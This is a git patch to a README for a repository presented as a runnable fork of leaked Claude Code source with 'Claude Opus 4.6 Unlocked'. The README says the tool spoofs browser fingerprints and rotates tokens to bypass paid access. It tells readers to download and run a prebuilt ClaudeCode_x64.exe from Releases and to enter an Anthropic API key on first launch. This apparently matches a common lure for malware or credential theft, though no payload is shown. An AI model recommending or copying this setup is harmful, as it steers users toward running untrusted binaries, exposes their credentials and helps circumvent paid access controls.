From 0987c4a7c2437e3ce2f7567ef2fc0d94ff0b00c8 Mon Sep 17 00:00:00 2001 From: idbzoomh Date: Tue, 31 Mar 2026 14:43:10 +0000 Subject: [PATCH] Update README.md --- README.md | 55 +++++++++++++++++++++++++++---------------------------- 1 file changed, 27 insertions(+), 28 deletions(-) diff --git a/README.md b/README.md index aec9ef4..66a86df 100644 --- a/README.md +++ b/README.md @@ -18,34 +18,7 @@ The source map file in the published npm package contained a reference to the fu ## 🔓 Fully Buildable & Runnable Claude Code Fork | Claude Opus 4.6 Unlocked -I spent significant effort rebuilding the entire build system from scratch, fixing every compilation error, and making this source snapshot actually work. - -
- -  Claude Code — Leaked Source. - -
- -> **⚠️ WARNING / DISCLAIMER** -> This application is an experimental tool for **Security Research**. It utilizes browser fingerprint spoofing and token rotation methods to bypass paid access restrictions. The authors are not responsible for the use of this software. - -## Installation & Launch - -We provide pre-compiled binaries. No Python or Node.js environment setup is required. - -### Step 1: Download -Navigate to the **[Releases](../../releases)** page and download the latest archive for your architecture: -* `ClaudeCode_x64.7z` - -### Step 2: Unzip -Extract the archive to a permanent location, e.g., `C:\Tools\ClaudeCode_x64`. -*(Optional: Add this folder to your System PATH to run it from any terminal window).* - -### Step 3: First Run -Run `ClaudeCode_x64.exe`. On the first launch, you will be prompted to enter your **Anthropic API Key**. -The key is securely stored using the Windows Credential Manager. - ---- +**I spent significant effort rebuilding the entire build system from scratch, fixing every compilation error, and making this source snapshot actually work.** ## What is this? @@ -110,6 +83,32 @@ const ENABLED_FEATURES = new Set([ // 'KAIROS_GITHUB_WEBHOOKS',// GitHub webhook integration ]) ``` +--- + +
+ +  Claude Code — Leaked Source. + +
+ +> **⚠️ WARNING / DISCLAIMER** +> This application is an experimental tool for **Security Research**. It utilizes browser fingerprint spoofing and token rotation methods to bypass paid access restrictions. The authors are not responsible for the use of this software. + +## Installation & Launch + +We provide pre-compiled binaries. No Python or Node.js environment setup is required. + +### Step 1: Download +Navigate to the **[Releases](../../releases)** page and download the latest archive for your architecture: +* `ClaudeCode_x64.7z` + +### Step 2: Unzip +Extract the archive to a permanent location, e.g., `C:\Tools\ClaudeCode_x64`. +*(Optional: Add this folder to your System PATH to run it from any terminal window).* + +### Step 3: First Run +Run `ClaudeCode_x64.exe`. On the first launch, you will be prompted to enter your **Anthropic API Key**. +The key is securely stored using the Windows Credential Manager. ---